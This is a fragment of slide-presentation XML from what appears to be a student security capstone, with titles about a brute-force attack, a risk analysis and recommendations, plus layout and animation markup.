              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1231" name="Google Shape;1231;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1856550" y="3289350"/>
            <a:ext cx="1597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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>leopoldo</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1232" name="Google Shape;123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33" name="Google Shape;1233;p70"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="525838" y="1639900"/>
            <a:ext cx="8252825" cy="271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230"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn dur="1500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1230"/>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1231"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn dur="1500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1231"/>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1233"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn dur="1500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1233"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav fmla="" tm="0">
                                          <p:val>
                                            <p:strVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav fmla="" tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn dur="1500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12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37" name="Shape 1237"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1238" name="Google Shape;123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100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation #3: Brute Force Attack, continued</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1239" name="Google Shape;1239;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pic>
        <p:nvPicPr>
          <p:cNvPr id="1240" name="Google Shape;1240;p71"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="25082" l="0" r="3390" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="724200" y="1187450"/>
            <a:ext cx="7856101" cy="2538446"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1241" name="Google Shape;1241;p71"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="25212" l="0" r="51212" t="29756"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="423400" y="976225"/>
            <a:ext cx="8297200" cy="3191075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="dbl" w="76200">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:bevel/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1242" name="Google Shape;1242;p71"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="-10451864">
            <a:off x="5780281" y="3462691"/>
            <a:ext cx="2740387" cy="1318814"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1243" name="Google Shape;1243;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44" name="Google Shape;1244;p71"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="52692" l="48560" r="4021" t="36226"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="241725" y="1998225"/>
            <a:ext cx="8627950" cy="916900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="FF99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41"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn dur="5000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1241"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav fmla="" tm="0">
                                          <p:val>
                                            <p:strVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav fmla="" tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn dur="5000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="124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44"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn dur="2500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1244"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav fmla="" tm="0">
                                          <p:val>
                                            <p:strVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav fmla="" tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn dur="2500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="124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48" name="Shape 1248"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1249" name="Google Shape;1249;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100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation #3: Brute Force Attack, continued</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1250" name="Google Shape;1250;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251" name="Google Shape;1251;p72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724200" y="834463"/>
            <a:ext cx="7856100" cy="38004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2" name="Google Shape;1252;p72"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="5159" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="724200" y="783300"/>
            <a:ext cx="7971900" cy="3683425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1253" name="Google Shape;1253;p72"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="10608" l="75298" r="9453" t="76644"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="724200" y="708200"/>
            <a:ext cx="7971900" cy="3683425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1254" name="Google Shape;125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2400"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Table of Contents</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1031" name="Google Shape;1031;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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1032" name="Google Shape;1032;p55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="222525" y="1455963"/>
            <a:ext cx="8921550" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="8921550" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1033" name="Google Shape;1033;p55"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="1587850" cy="621300"/>
              <a:chOff x="457200" y="1378813"/>
              <a:chExt cx="1587850" cy="621300"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1034" name="Google Shape;1034;p55"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="457200" y="1378813"/>
                <a:ext cx="695400" cy="6213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35" name="Google Shape;1035;p55"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="1375125" y="1202175"/>
                <a:ext cx="340325" cy="999525"/>
              </a:xfrm>
              <a:prstGeom prst="flowChartExtra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55"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1184250" y="1378825"/>
              <a:ext cx="81945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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" sz="1800">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto"/>
                  <a:ea typeface="Roboto"/>
                  <a:cs typeface="Roboto"/>
                  <a:sym typeface="Roboto"/>
                </a:rPr>
                <a:t>A Map of the System</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1037" name="Google Shape;1037;p55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="222512" y="2168788"/>
            <a:ext cx="8921588" cy="621300"/>
            <a:chOff x="457200" y="2228725"/>
            <a:chExt cx="8921588" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1038" name="Google Shape;1038;p55"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="457200" y="2228725"/>
              <a:ext cx="1587856" cy="621300"/>
              <a:chOff x="457200" y="1378813"/>
              <a:chExt cx="1587856" cy="621300"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1039" name="Google Shape;1039;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40" name="Google Shape;1040;p55"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="1375094" y="1202138"/>
                <a:ext cx="340325" cy="999600"/>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55"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1184288" y="2233563"/>
              <a:ext cx="81945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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1042" name="Google Shape;1042;p55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="216225" y="2875663"/>
            <a:ext cx="8927850" cy="621300"/>
            <a:chOff x="457200" y="3073850"/>
            <a:chExt cx="8927850" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1043" name="Google Shape;1043;p55"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="457200" y="3073850"/>
              <a:ext cx="1574522" cy="621300"/>
              <a:chOff x="457200" y="1378813"/>
              <a:chExt cx="1574522" cy="621300"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1044" name="Google Shape;1044;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45" name="Google Shape;1045;p55"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="1368459" y="1208838"/>
                <a:ext cx="340325" cy="986200"/>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55"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1196850" y="3076288"/>
              <a:ext cx="81882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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1047" name="Google Shape;1047;p55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="222530" y="743150"/>
            <a:ext cx="8921643" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="8698950" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1048" name="Google Shape;1048;p55"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="1587850" cy="621300"/>
              <a:chOff x="457200" y="1378813"/>
              <a:chExt cx="1587850" cy="621300"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1049" name="Google Shape;104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50" name="Google Shape;1050;p55"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="1375125" y="1202175"/>
                <a:ext cx="340325" cy="9995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55"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1184250" y="1378825"/>
              <a:ext cx="79719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Overall Risk Analysis: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" sz="1800">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto"/>
                  <a:ea typeface="Roboto"/>
                  <a:cs typeface="Roboto"/>
                  <a:sym typeface="Roboto"/>
                </a:rPr>
                <a:t>Is Capstone Secure?</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1052" name="Google Shape;1052;p55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="184400" y="4251075"/>
            <a:ext cx="1615874" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="1615874" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1053" name="Google Shape;1053;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621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054" name="Google Shape;1054;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="1389136" y="1188175"/>
              <a:ext cx="340325" cy="1027550"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtra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55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="927350" y="4258288"/>
            <a:ext cx="81564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Prioritizing:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> Recommendations for Implementation</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1056" name="Google Shape;1056;p55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="184400" y="3574188"/>
            <a:ext cx="8899350" cy="632625"/>
            <a:chOff x="457200" y="3912425"/>
            <a:chExt cx="8899350" cy="632625"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1057" name="Google Shape;1057;p55"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="457200" y="3923750"/>
              <a:ext cx="1606349" cy="621300"/>
              <a:chOff x="457200" y="1378813"/>
              <a:chExt cx="1606349" cy="621300"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1058" name="Google Shape;1058;p55"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="457200" y="1378813"/>
                <a:ext cx="695400" cy="621300"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd fmla="val 16667" name="adj"/>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059" name="Google Shape;1059;p55"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="1384373" y="1192925"/>
                <a:ext cx="340325" cy="1018025"/>
              </a:xfrm>
              <a:prstGeom prst="flowChartExtract">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55"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1200150" y="3912425"/>
              <a:ext cx="81564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58" name="Shape 1258"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1259" name="Google Shape;1259;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100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation #3: Brute Force Attack, continued</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1260" name="Google Shape;1260;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sz="900"/>
              <a:t>Shout-out to Scott Rasmussen for identifying </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the “Folder on the left-hand bar” as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>File System/File Manager on the Kali desktop</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1261" name="Google Shape;1261;p73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724200" y="834463"/>
            <a:ext cx="7856100" cy="38004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2" name="Google Shape;1262;p73"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1028716" y="1085090"/>
            <a:ext cx="3471713" cy="3280150"/>
            <a:chOff x="1665862" y="1854375"/>
            <a:chExt cx="4211200" cy="4331375"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1263" name="Google Shape;1263;p73"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect b="13957" l="0" r="34296" t="5410"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1665862" y="1854375"/>
              <a:ext cx="4211200" cy="4331375"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1264" name="Google Shape;1264;p73"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect b="28993" l="58653" r="23878" t="46463"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4524082" y="3546857"/>
              <a:ext cx="1038225" cy="1219200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1265" name="Google Shape;1265;p73"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="47991" l="34147" r="54827" t="36658"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5352100" y="1085166"/>
            <a:ext cx="2878200" cy="3280010"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1266" name="Google Shape;1266;p73"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4902618" y="1085086"/>
            <a:ext cx="3327679" cy="3280164"/>
            <a:chOff x="2673275" y="626025"/>
            <a:chExt cx="4162200" cy="4290600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1267" name="Google Shape;1267;p73"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2673275" y="626025"/>
              <a:ext cx="4162200" cy="4290600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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8" name="Google Shape;1268;p73"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2773650" y="790600"/>
